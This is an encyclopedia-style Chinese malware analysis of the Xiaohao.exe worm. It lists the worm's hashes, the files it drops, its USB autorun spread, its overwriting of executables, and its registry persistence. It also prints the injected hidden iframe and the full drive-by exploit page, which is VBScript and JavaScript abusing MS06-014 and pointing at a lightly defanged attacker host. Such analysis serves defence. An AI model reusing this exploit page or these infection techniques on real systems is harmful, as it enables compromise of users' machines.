词条 | Xiaohao.exe |
释义 | 病毒简介文件名称:Xiaohao.exe 文件大小:12288 字节 AV命名:Virus.Win32.Agent.o(瑞星) 加壳方式:UPX 0.89.6 - 1.02 / 1.05 - 1.24 编写语言:Microsoft Visual C++ 6.0 病毒类型:蠕虫 文件MD5:B50ED06B61CDCF060D0136784999E50C 文件SHA1:ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD 传播方式:U盘等移动.介质、网页漏洞。 所在系统:Win9x, WinMe, WinNT, Win2000, WinXp, Win2003 病毒分析1、释放病毒文件: %Systemroot%\\system32\\dllcache\\dvdplay.exe %Systemroot%\\system32\\OLDA.tmp %Systemroot%\\system32\\exloroe.exe 其中主体Xiaohao.exe常驻进程。 2、尝试启动C:\\Program Files\\Internet Explorer\\iexplore.exe,不过未见其他行为。 3、Xiaohao.exe查找可用的磁盘,在其目录下生成:Xiaohao.exe和Autorun.inf 如双击磁盘,则激活病毒。 (如果在插入U盘情况下,运行被感染的病毒,那么U盘目录会生成Xiaohao.exe和Autorun.inf) 4、遍历磁盘所有文件,如遇到.exe文件则覆盖,并在文件尾增加感染标记“ygr” 覆盖文件头部,导致可执行文件结构被破坏。文件全部变成一个“浩”字。 由于无判断路径,系统文件也.被破坏了,重启后可能无法开机。 并且一些系统设置和配置失效,例如系统时间会被修改。 5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码: <ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></ifram> 代码: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>IE 0Day</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD> <BODY> <SCRIPT language=javascript> window.status=""; function detectOS() { if(navigator.userAgent.indexOf("Windows NT 5.1") != -1) { OS = "Windows XP"; } else { if(navigator.userAgent.indexOf("Windows NT 5.2") != -1) {OS = "Windows 2003";} else {OS = "Windows 2000";} } return OS; } function MakeItSo() { if(detectOS() == "Windows XP") { //2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm window.location.href="baobao.htm"; } else {if(detectOS() == "Windows 2003") { //2YWwO5M3N*2003 window.location.href="zhu3.htm"; } else { //2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm window.location.href="banner.htm"; } } } </SCRIPT> <SCRIPT language=VBScript> on error resume next Set downf = document.createElement("object") downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36" str="Microsoft.XMLHTTP" Set O = downf.CreateObject(str,"") if Not Err.Number = 0 then err.clear //C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm document.write("<scr"&"ipt language=""javascript"">window.setTimeout(""MakeItSo()"",5000);</sc"&"ript>") else //SPMS06-014B)64,V4PP06-0145DMxBmad.htm document.write("<iframe width=""0"" height=""0"" src=""zhu3.htm""></iframe>") end if </SCRIPT> <script src=yun.js></script> <SCRIPT language=javascript type=text/javascript> var cookieString = document.cookie; var start = cookieString.indexOf("woshi0day="); if (start != -1) {} else { var expires = new Date(); expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000); document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString(); document.write("<iframe width=0 height=0 src=baobao.htm></iframe>"); }</SCRIPT> </BODY></HTML> 由操作系统版本判断,决定跳转的网页。 首先检测是否存在MS06-014漏洞,若有,则跳至h**p://xiaohao.yona.biz/zhu3.htm 如无意外,可获样本:h**p://xiaohao.yona.biz/xiaohao.exe 若无MS06-014漏洞,则跳至h**p://xiaohao.yona.biz/baobao.htm. 代码以十进制加密,解密后得一个0day木马。 6、修改注册表(不记得哪里,哈哈``),删除开始菜单的快捷方式。 7、修改进程窗口标.题,为:已中毒 X14o-H4o''s Virus 8、如病毒在进程,在进入一个目录后,所有文件(被感染文件除外)属性皆被设置为隐藏! 9、破坏显示隐藏文件,设置为“不显示”。 10、写入注册表,开机自启: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ 指向%SystemRoot%\\system32\\exloroe.exe(这一步使系统启动不了!) 11、保存被感染的文件列表C:\\Jilu.txt 病毒作者网名:X14oH4o 百度空间:/xh_hook 住址:江西南昌 |
随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。